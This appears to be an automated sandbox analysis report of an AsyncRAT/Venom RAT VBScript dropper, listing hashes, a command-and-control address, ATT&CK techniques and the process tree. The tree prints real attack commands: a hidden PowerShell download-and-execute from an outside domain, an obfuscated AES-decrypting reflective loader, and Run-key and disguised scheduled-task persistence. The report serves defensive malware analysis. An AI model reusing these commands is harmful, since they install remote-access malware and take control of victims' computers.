asyncrat | 823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9

Analysis

max time kernel
93s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-12-2024 02:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs
Size

67KB
MD5

12d9b975c280a2500a1f13ee88cd5dcc
SHA1

d2ff34e43857aafc57217cfb7cdc5bb3b2825b66
SHA256

823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9
SHA512

ec0a70030c775ee18f5482e756e6b4abacdf0e14516335771a8995be7059eb037dc18c27d2844927fdde37b17cae9226f173ffda8334e764f478fe2181a31430
SSDEEP

1536:dha8UpBzancwZOnc9/FQa6vYGl2Yo7ZkeXeFuGbVSPXCAG:7Ur2Ocmo7ZkieFuyIG

Score

10^/10

asyncrat dec2024 execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Dec2024

45.88.88.7:6845

Mutex

zmkdvkzgwmnzhgvxwwk

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/3800-113-0x000001FCB9880000-0x000001FCB9898000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
35	3800	powershell.exe
37	3800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3344	powershell.exe
2868	powershell.exe
2092	powershell.exe
3088	powershell.exe
2988	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftService = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\system.bat\""	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4628	timeout.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
3344	powershell.exe
3344	powershell.exe
2212	powershell.exe
2212	powershell.exe
2868	powershell.exe
2868	powershell.exe
4452	powershell.exe
4452	powershell.exe
2092	powershell.exe
2092	powershell.exe
3800	powershell.exe
3800	powershell.exe
3088	powershell.exe
3088	powershell.exe
2800	powershell.exe
2800	powershell.exe
2988	powershell.exe
2988	powershell.exe
3800	powershell.exe
3800	powershell.exe
3800	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3344	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4452	powershell.exe
Token: SeSecurityPrivilege	4452	powershell.exe
Token: SeTakeOwnershipPrivilege	4452	powershell.exe
Token: SeLoadDriverPrivilege	4452	powershell.exe
Token: SeSystemProfilePrivilege	4452	powershell.exe
Token: SeSystemtimePrivilege	4452	powershell.exe
Token: SeProfSingleProcessPrivilege	4452	powershell.exe
Token: SeIncBasePriorityPrivilege	4452	powershell.exe
Token: SeCreatePagefilePrivilege	4452	powershell.exe
Token: SeBackupPrivilege	4452	powershell.exe
Token: SeRestorePrivilege	4452	powershell.exe
Token: SeShutdownPrivilege	4452	powershell.exe
Token: SeDebugPrivilege	4452	powershell.exe
Token: SeSystemEnvironmentPrivilege	4452	powershell.exe
Token: SeRemoteShutdownPrivilege	4452	powershell.exe
Token: SeUndockPrivilege	4452	powershell.exe
Token: SeManageVolumePrivilege	4452	powershell.exe
Token: 33	4452	powershell.exe
Token: 34	4452	powershell.exe
Token: 35	4452	powershell.exe
Token: 36	4452	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeIncreaseQuotaPrivilege	2092	powershell.exe
Token: SeSecurityPrivilege	2092	powershell.exe
Token: SeTakeOwnershipPrivilege	2092	powershell.exe
Token: SeLoadDriverPrivilege	2092	powershell.exe
Token: SeSystemProfilePrivilege	2092	powershell.exe
Token: SeSystemtimePrivilege	2092	powershell.exe
Token: SeProfSingleProcessPrivilege	2092	powershell.exe
Token: SeIncBasePriorityPrivilege	2092	powershell.exe
Token: SeCreatePagefilePrivilege	2092	powershell.exe
Token: SeBackupPrivilege	2092	powershell.exe
Token: SeRestorePrivilege	2092	powershell.exe
Token: SeShutdownPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeSystemEnvironmentPrivilege	2092	powershell.exe
Token: SeRemoteShutdownPrivilege	2092	powershell.exe
Token: SeUndockPrivilege	2092	powershell.exe
Token: SeManageVolumePrivilege	2092	powershell.exe
Token: 33	2092	powershell.exe
Token: 34	2092	powershell.exe
Token: 35	2092	powershell.exe
Token: 36	2092	powershell.exe
Token: SeIncreaseQuotaPrivilege	2092	powershell.exe
Token: SeSecurityPrivilege	2092	powershell.exe
Token: SeTakeOwnershipPrivilege	2092	powershell.exe
Token: SeLoadDriverPrivilege	2092	powershell.exe
Token: SeSystemProfilePrivilege	2092	powershell.exe
Token: SeSystemtimePrivilege	2092	powershell.exe
Token: SeProfSingleProcessPrivilege	2092	powershell.exe
Token: SeIncBasePriorityPrivilege	2092	powershell.exe
Token: SeCreatePagefilePrivilege	2092	powershell.exe
Token: SeBackupPrivilege	2092	powershell.exe
Token: SeRestorePrivilege	2092	powershell.exe
Token: SeShutdownPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeSystemEnvironmentPrivilege	2092	powershell.exe
Token: SeRemoteShutdownPrivilege	2092	powershell.exe
Token: SeUndockPrivilege	2092	powershell.exe
Token: SeManageVolumePrivilege	2092	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3800	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 3820 wrote to memory of 3344	3820	WScript.exe	83
PID 3820 wrote to memory of 3344	3820	WScript.exe	83
PID 3820 wrote to memory of 3076	3820	WScript.exe	100
PID 3820 wrote to memory of 3076	3820	WScript.exe	100
PID 3076 wrote to memory of 2940	3076	cmd.exe	102
PID 3076 wrote to memory of 2940	3076	cmd.exe	102
PID 2940 wrote to memory of 1932	2940	cmd.exe	104
PID 2940 wrote to memory of 1932	2940	cmd.exe	104
PID 2940 wrote to memory of 2212	2940	cmd.exe	105
PID 2940 wrote to memory of 2212	2940	cmd.exe	105
PID 2212 wrote to memory of 2868	2212	powershell.exe	106
PID 2212 wrote to memory of 2868	2212	powershell.exe	106
PID 2212 wrote to memory of 4452	2212	powershell.exe	107
PID 2212 wrote to memory of 4452	2212	powershell.exe	107
PID 2212 wrote to memory of 2092	2212	powershell.exe	110
PID 2212 wrote to memory of 2092	2212	powershell.exe	110
PID 2212 wrote to memory of 116	2212	powershell.exe	112
PID 2212 wrote to memory of 116	2212	powershell.exe	112
PID 116 wrote to memory of 4080	116	cmd.exe	114
PID 116 wrote to memory of 4080	116	cmd.exe	114
PID 4080 wrote to memory of 2768	4080	cmd.exe	116
PID 4080 wrote to memory of 2768	4080	cmd.exe	116
PID 4080 wrote to memory of 3800	4080	cmd.exe	117
PID 4080 wrote to memory of 3800	4080	cmd.exe	117
PID 3800 wrote to memory of 3088	3800	powershell.exe	118
PID 3800 wrote to memory of 3088	3800	powershell.exe	118
PID 3800 wrote to memory of 2800	3800	powershell.exe	119
PID 3800 wrote to memory of 2800	3800	powershell.exe	119
PID 2940 wrote to memory of 4628	2940	cmd.exe	121
PID 2940 wrote to memory of 4628	2940	cmd.exe	121
PID 3800 wrote to memory of 2988	3800	powershell.exe	122
PID 3800 wrote to memory of 2988	3800	powershell.exe	122

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\823fce06a9659813c5c77358e7759ff067902c4c49b10787a2d698bfe55a28a9.vbs"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\system.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\system.bat';$Qstz='SpzjXAlzjXAitzjXA'.Replace('zjXA', ''),'TfJIHranfJIHsffJIHofJIHrfJIHmFfJIHinafJIHlfJIHBlofJIHcfJIHkfJIH'.Replace('fJIH', ''),'RVgYzeadVgYzLiVgYznesVgYz'.Replace('VgYz', ''),'InMwMavoMwMakMwMaeMwMa'.Replace('MwMa', ''),'DecsNGQomsNGQpresNGQssNGQssNGQ'.Replace('sNGQ', ''),'CoHJBApyTHJBAoHJBA'.Replace('HJBA', ''),'CrXqfmeatXqfmeDeXqfmcryXqfmptXqfmorXqfm'.Replace('Xqfm', ''),'GeFjYVtFjYVCFjYVurFjYVrenFjYVtFjYVPrFjYVocFjYVesFjYVsFjYV'.Replace('FjYV', ''),'LozlYIazlYIdzlYI'.Replace('zlYI', ''),'CLJmzhLJmzanLJmzgeELJmzxtLJmzenLJmzsLJmzionLJmz'.Replace('LJmz', ''),'EeFjtleeFjtmeeFjtneFjttAeFjtteFjt'.Replace('eFjt', ''),'MdbpiaindbpiModbpiddbpiuledbpi'.Replace('dbpi', ''),'FrRYFzoRYFzmBRYFzaRYFzsRYFze6RYFz4RYFzSRYFztrRYFzinRYFzgRYFz'.Replace('RYFz', ''),'EncrkwtcrkwrcrkwyPocrkwicrkwntcrkw'.Replace('crkw', '');powershell -w hidden;function RgsAI($BWcmp){$GWmwK=[System.Security.Cryptography.Aes]::Create();$GWmwK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GWmwK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GWmwK.Key=[System.Convert]::($Qstz[12])('bVSs74+10Z+7ASHf34iR8A7lXdmOJD3coRGmA4lMt4I=');$GWmwK.IV=[System.Convert]::($Qstz[12])('iE6BirpwfNsKBuhzhqFgjw==');$OWgUJ=$GWmwK.($Qstz[6])();$MLceL=$OWgUJ.($Qstz[1])($BWcmp,0,$BWcmp.Length);$OWgUJ.Dispose();$GWmwK.Dispose();$MLceL;}function frMFN($BWcmp){$ssjuW=New-Object System.IO.MemoryStream(,$BWcmp);$upHUk=New-Object System.IO.MemoryStream;$WGXAI=New-Object System.IO.Compression.GZipStream($ssjuW,[IO.Compression.CompressionMode]::($Qstz[4]));$WGXAI.($Qstz[5])($upHUk);$WGXAI.Dispose();$ssjuW.Dispose();$upHUk.Dispose();$upHUk.ToArray();}$DXhXo=[System.IO.File]::($Qstz[2])([Console]::Title);$YYyyJ=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 5).Substring(2))));$eqMxD=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 6).Substring(2))));[System.Reflection.Assembly]::($Qstz[8])([byte[]]$eqMxD).($Qstz[13]).($Qstz[3])($null,$null);[System.Reflection.Assembly]::($Qstz[8])([byte[]]$YYyyJ).($Qstz[13]).($Qstz[3])($null,$null); "
      4⤵
      PID:1932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2212
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\system')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 82953' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network82953Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network82953Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:116
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network82953Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network82953Man.cmd';$Qstz='SpzjXAlzjXAitzjXA'.Replace('zjXA', ''),'TfJIHranfJIHsffJIHofJIHrfJIHmFfJIHinafJIHlfJIHBlofJIHcfJIHkfJIH'.Replace('fJIH', ''),'RVgYzeadVgYzLiVgYznesVgYz'.Replace('VgYz', ''),'InMwMavoMwMakMwMaeMwMa'.Replace('MwMa', ''),'DecsNGQomsNGQpresNGQssNGQssNGQ'.Replace('sNGQ', ''),'CoHJBApyTHJBAoHJBA'.Replace('HJBA', ''),'CrXqfmeatXqfmeDeXqfmcryXqfmptXqfmorXqfm'.Replace('Xqfm', ''),'GeFjYVtFjYVCFjYVurFjYVrenFjYVtFjYVPrFjYVocFjYVesFjYVsFjYV'.Replace('FjYV', ''),'LozlYIazlYIdzlYI'.Replace('zlYI', ''),'CLJmzhLJmzanLJmzgeELJmzxtLJmzenLJmzsLJmzionLJmz'.Replace('LJmz', ''),'EeFjtleeFjtmeeFjtneFjttAeFjtteFjt'.Replace('eFjt', ''),'MdbpiaindbpiModbpiddbpiuledbpi'.Replace('dbpi', ''),'FrRYFzoRYFzmBRYFzaRYFzsRYFze6RYFz4RYFzSRYFztrRYFzinRYFzgRYFz'.Replace('RYFz', ''),'EncrkwtcrkwrcrkwyPocrkwicrkwntcrkw'.Replace('crkw', '');powershell -w hidden;function RgsAI($BWcmp){$GWmwK=[System.Security.Cryptography.Aes]::Create();$GWmwK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$GWmwK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$GWmwK.Key=[System.Convert]::($Qstz[12])('bVSs74+10Z+7ASHf34iR8A7lXdmOJD3coRGmA4lMt4I=');$GWmwK.IV=[System.Convert]::($Qstz[12])('iE6BirpwfNsKBuhzhqFgjw==');$OWgUJ=$GWmwK.($Qstz[6])();$MLceL=$OWgUJ.($Qstz[1])($BWcmp,0,$BWcmp.Length);$OWgUJ.Dispose();$GWmwK.Dispose();$MLceL;}function frMFN($BWcmp){$ssjuW=New-Object System.IO.MemoryStream(,$BWcmp);$upHUk=New-Object System.IO.MemoryStream;$WGXAI=New-Object System.IO.Compression.GZipStream($ssjuW,[IO.Compression.CompressionMode]::($Qstz[4]));$WGXAI.($Qstz[5])($upHUk);$WGXAI.Dispose();$ssjuW.Dispose();$upHUk.Dispose();$upHUk.ToArray();}$DXhXo=[System.IO.File]::($Qstz[2])([Console]::Title);$YYyyJ=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 5).Substring(2))));$eqMxD=frMFN (RgsAI ([Convert]::($Qstz[12])([System.Linq.Enumerable]::($Qstz[10])($DXhXo, 6).Substring(2))));[System.Reflection.Assembly]::($Qstz[8])([byte[]]$eqMxD).($Qstz[13]).($Qstz[3])($null,$null);[System.Reflection.Assembly]::($Qstz[8])([byte[]]$YYyyJ).($Qstz[13]).($Qstz[3])($null,$null); "
        7⤵
        
        PID:2768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network82953Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 82953' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network82953Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2988
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:4628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6429f23067c70cb643f4e16a5c4e72bd

SHA1
3dd3bc87fbb09cddf33b004f28bf57ee3c0c32e7

SHA256
f51c0b76219dcaab55f3fcb9477f4b4042a2457b331c2d99b8cc28cd53067ee5

SHA512
c9d61ae32815d67c182871cdc6c4bbc1210b85b9c25886ccd9d327f4e197e59d1d911b16b4a7f069e24a03d8231e98aa7258fb02f3aeac572677532aa3e95835

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9d662ecae338ca923a784422a86e9925

SHA1
ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

SHA256
af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

SHA512
5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b66db53846de4860ca72a3e59b38c544

SHA1
2202dc88e9cddea92df4f4e8d83930efd98c9c5a

SHA256
b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030

SHA512
72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
783ef05620af5db5babff852b0a8f4b2

SHA1
586ca7dbd8e78e45c4d0be50b0955f78bb4ca3a9

SHA256
9b3f4709011eaae88902f4bddec7baa86046ecc95ea16285c8c3e18db8a18d0f

SHA512
9a146d618135d44eb6aacb8e492b00823f2754954d853632a7d8e15ef34a8f22d08212f1b9d57c6fe743136398fb077289b52baa22c7016b600098132ba13a55

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5yjiqhwa.gcy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
66KB

MD5
63de01f12144baf2b505f8eea95ae3a9

SHA1
b1428ef307e63503219af46059b89fb60487f7c4

SHA256
32d96866203a868b1d4f28560239e66421b412cfa184a876485c39da56f3d979

SHA512
de86970f4eff4a449eaf2d992da255b020c6e384c97d02c3e05ea07bb2a67d543d1701c7beed9a23bb88d82097728ad6b4fb452ac48182b44a894a15bcf712d0

Download Submit
memory/2212-44-0x000001B1E5560000-0x000001B1E5570000-memory.dmp

Filesize
64KB

Download
memory/2212-32-0x000001B1E57D0000-0x000001B1E5814000-memory.dmp

Filesize
272KB

Download
memory/2212-33-0x000001B1E58A0000-0x000001B1E5916000-memory.dmp

Filesize
472KB

Download
memory/3344-17-0x00007FFDE12E0000-0x00007FFDE1DA1000-memory.dmp

Filesize
10.8MB

Download
memory/3344-0-0x00007FFDE12E3000-0x00007FFDE12E5000-memory.dmp

Filesize
8KB

Download
memory/3344-14-0x00007FFDE12E0000-0x00007FFDE1DA1000-memory.dmp

Filesize
10.8MB

Download
memory/3344-13-0x00007FFDE12E0000-0x00007FFDE1DA1000-memory.dmp

Filesize
10.8MB

Download
memory/3344-12-0x00007FFDE12E0000-0x00007FFDE1DA1000-memory.dmp

Filesize
10.8MB

Download
memory/3344-11-0x00007FFDE12E0000-0x00007FFDE1DA1000-memory.dmp

Filesize
10.8MB

Download
memory/3344-8-0x000002AE39380000-0x000002AE393A2000-memory.dmp

Filesize
136KB

Download
memory/3800-113-0x000001FCB9880000-0x000001FCB9898000-memory.dmp

Filesize
96KB

Download